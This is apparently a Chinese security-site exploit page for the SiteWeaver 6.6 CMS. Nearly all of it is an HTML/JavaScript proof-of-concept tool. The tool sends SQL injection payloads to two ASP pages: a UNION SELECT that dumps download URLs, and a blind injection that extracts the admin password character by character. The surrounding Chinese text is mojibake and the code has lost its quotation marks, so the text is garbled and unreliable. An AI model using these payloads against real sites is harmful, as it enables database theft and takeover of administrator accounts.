SiteWeaver6.6ע©Exploit


Է:

@Sebug.net   dis
վṩ()ܴй,ȫоѧ֮,Ը!1.<script> 2.function gb2utf8(data){ 3.var glbEncode = []; 4.gb2utf8_data = data; 5.execScript(gb2utf8_data = MidB(gb2utf8_data, 1), VBScript); 6.var t=escape(gb2utf8_data).replace(/%u/g,).replace(/(.{2})(.{2})/g,%$2%$1).replace(/%([A-Z].)%(.{2})/g,@$1$2); 7.t=t.split(@); 8.var i=0,j=t.length,k; 9.while(++i<j) { 10.k=t[i].substring(0,4); 11.if(!glbEncode[k]) { 12.gb2utf8_char = eval(0x+k); 13.execScript(gb2utf8_char = Chr(gb2utf8_char), VBScript); 14.glbEncode[k]=escape(gb2utf8_char).substring(1,6); 15.} 16.t[i]=glbEncode[k]+t[i].substring(4); 17.} 18.gb2utf8_data = gb2utf8_char = null; 19.return unescape(t.join(%)); 20.} 21. 22.function PostData(){ 23.var url = document.getElementById(url).value; 24.var post= document.getElementById(post).value; 25.var oXmlHttp = new ActiveXObject(Microsoft.XMLHTTP); 26.oXmlHttp.open(POST, url, false); 27.if (url.indexOf(User_CheckReg.asp)>0){oXmlHttp.setRequestHeader(Content-Type,application/x-www-form-urlencoded);} 28.oXmlHttp.send(post); 29.var GetResult=gb2utf8(oXmlHttp.responseBody); 30.if (oXmlHttp.readyState == 4) { 31.if (oXmlHttp.status == 200) { 32.document.getElementById(getResult).value = GetResult; 33.} 34.} 35.} 36.function Inject(i){ 37.if (i==1){ 38.document.getElementById(url).value=http://127.0.0.1:81/pe2006/Dyna_Page.asp; 39.document.getElementById(post).value=<?xml version=1.0 encoding=gb2312?><root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root>; 40.} 41.else 42.{ 43.document.getElementById(url).value=http://127.0.0.1:81/pe2006/Reg/User_CheckReg.asp; 44.document.getElementById(post).value=UserName=admino%20union%20select%201%20from%20pe_admin%20where%20username=adminband%20Mid(password,1,1)>0; 45.} 46.} 47. 48.</script> 49.<BODY> 50.<div align=center>SiteWeaver6.6©ù</div> 51.URL<br> 52.<INPUT TYPE=text id=url value=http://127.0.0.1:81/pe2006/Dyna_Page.asp style=width:90%;>&nbsp;&nbsp;&nbsp;<br> 53.Post<br> 54.<textArea id=post style=width:90%; height:80;><?xml version=1.0 encoding=gb2312?> 55.<root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root></textArea> 56.<div align=center><INPUT TYPE=button value=©һʾ onClick=Inject(1);>&nbsp;&nbsp;<INPUT TYPE=button value=    onClick=PostData();>&nbsp;&nbsp;<INPUT TYPE=button value=©ʾ onClick=Inject(2);></div> 57.<hr size=2 > 58.ע<br> 59.<textArea id=getResult style=width:90%; height:200;></textArea> 60.</BODY> 